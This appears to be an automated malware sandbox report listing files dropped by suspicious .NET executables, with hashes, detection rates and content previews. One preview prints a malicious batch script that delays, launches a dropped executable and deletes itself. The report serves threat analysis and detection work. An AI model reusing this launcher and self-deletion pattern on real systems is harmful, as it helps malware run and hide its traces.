                                                                                                                  SSDEEP:24:fAJkZTsCD0P6TT6VP3EubsbV9QIWVdOvWFXY1Ev3zFHE7:fAJk7DcgT0UqEVYhFyEFE7
                                                                                                                  MD5:6A3F8D2AAE32109565EF9997310C1D33
                                                                                                                  SHA1:46E96EE1F0C2DF597F85EF882FE014EDD40AC250
                                                                                                                  SHA-256:0F9CAADB8CFAABB9A7EFD9C60C55D75D77962250E5F01CB4E23ADD18B95C24FD
                                                                                                                  SHA-512:9C5B19E1F9BFF04F4A311D78C35832D3A767934217445A8F0F57B0A2224495FDFDB2E3BFD5CE3CA56073B1BC902B253F995C0032B3E0E25F548A0C2A3106170C
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):513
                                                                                                                  Entropy (8bit):5.87193213112321
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:D1WBzbpYXGvz2nPjuEzEJ9pmdVg03811eSStMF1WR15CJx:ZGzZaPjpzw98dVg038botQ1k5Ax
                                                                                                                  MD5:24B7CEB7F8052BB48849160A33B12DCF
                                                                                                                  SHA1:9CD5407A1BA1DFEED3BB06C19E3B21F318FE0CF0
                                                                                                                  SHA-256:481616F1988DB8CB447197587046C238F5432A9807219F2818003E9808C3D4EF
                                                                                                                  SHA-512:23B3FEC982EBB3B15307CF6286D9D2DAF6ADFE7DF48A54FFE678CDA7C059C4C414B9809B3B04A8BAC4812738F3CAB26303A65E640462E3DF6DD2CEFAA45A6D3C
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                  Process:C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2041
                                                                                                                  Entropy (8bit):5.374034001672589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vtp5wmjB
                                                                                                                  MD5:6594A52AA7EC9BF342D53EF8C5C3F92F
                                                                                                                  SHA1:E4439EF0FB0002B8DAD1D7FC4BA598FEE910F4DE
                                                                                                                  SHA-256:1BCDE01217E85B5A7304A3DF69926B2B046B11826E3A70E78D220B063DB5EE2B
                                                                                                                  SHA-512:29B10494189EFC74EC781413CA1954053EA044EFA879C22EE1FC36D5CD80438F36EA87B7C9C8E0BC5216F13F2DDB893B37E5494A61A8A7DD830A5810A2016A84
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                  MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                  SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                  SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                  SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):98304
                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):114688
                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):49152
                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.403856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:BfkcUo8zO:kowO
                                                                                                                  MD5:847081DB2FE6097CFD6201FBF0EA05D7
                                                                                                                  SHA1:4C97F78F28E237C1DBB2620133726464015B845E
                                                                                                                  SHA-256:94276B1ABE83EB6659934313CFA7A1078A96EF6355565BAC2A104C0EA924D9A1
                                                                                                                  SHA-512:434566E7A360CEDB738A00F0053F8452728DCCC2D34D6905DA3C0040F494430F62353F253C6AE7A06293DCB9C9CF13E9D070E3CE33D5BF2A4C66D83D2AE13548
                                                                                                                  Malicious:false
                                                                                                                  Preview:4brIR94Pr2QyMVX0tfTKYe3h9
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.243856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:b0thUNn:AsNn
                                                                                                                  MD5:1F5F83D9A4DF4B06A8E1D70962AB928C
                                                                                                                  SHA1:09AA0AC9E0FE2989534306F7BEE4891432B8CB6F
                                                                                                                  SHA-256:D03864B8357424EE90AE0397E7F983A41EB19A6B5BDE95110ED09613F9A1D87B
                                                                                                                  SHA-512:96AED24966503555D36CC1C267E7DAB80D3BF882B535DFB5990E064D77EC109CAA5AF86E69FE4EE6B3A13F05CD7BEA6D7B06EBDF0ABDF93AE56789D8AA80B8B6
                                                                                                                  Malicious:false
                                                                                                                  Preview:EXQ6fwGYPv2k6bITXmuQafqjP
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):178
                                                                                                                  Entropy (8bit):5.3006650186981545
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQXJN+KilHiOkVfKbBktKcKZG1t+kiE2J5xAID:hCRLuVFOOr+DE1WD5XJQKiljbKOZG1wj
                                                                                                                  MD5:609BB83D98153B00DD92B7D11425F20A
                                                                                                                  SHA1:23AA8796919915F75E2527371080453A1DF62F0E
                                                                                                                  SHA-256:5FF980252ECAD9BEDC9179428D865B3E80C28896C82D5FE239C0B91948D213C9
                                                                                                                  SHA-512:017BBC6E363CCFEF995A8659ED2700DBB9158EF00C243BE53D6EEB6CD634677BB5DA21481FBED6E35B494E1C40D6827EFBD8F680160FBCE7A12055A421D2F7E1
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Templates\AvdGjRxbXYfvkpkpztF.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\y7jCVExOhX.bat"
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):9728
                                                                                                                  Entropy (8bit):5.0168086460579095
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Detection: malicious, Browse
                                                                                                                  • Filename: T3xpD9ZaYu.exe, Detection: malicious, Browse
                                                                                                                  • Filename: AvQTFKdsST.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe, Detection: malicious, Browse
                                                                                                                  • Filename: VL1xZpPp1I.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Detection: malicious, Browse
                                                                                                                  • Filename: oG6R4bo1Rd.exe, Detection: malicious, Browse
                                                                                                                  • Filename: BN57miasVe.exe, Detection: malicious, Browse
                                                                                                                  • Filename: YhyZwI1Upd.exe, Detection: malicious, Browse
                                                                                                                  • Filename: i3F8zuP3u9.exe, Detection: malicious, Browse
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):69632
                                                                                                                  Entropy (8bit):5.932541123129161
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
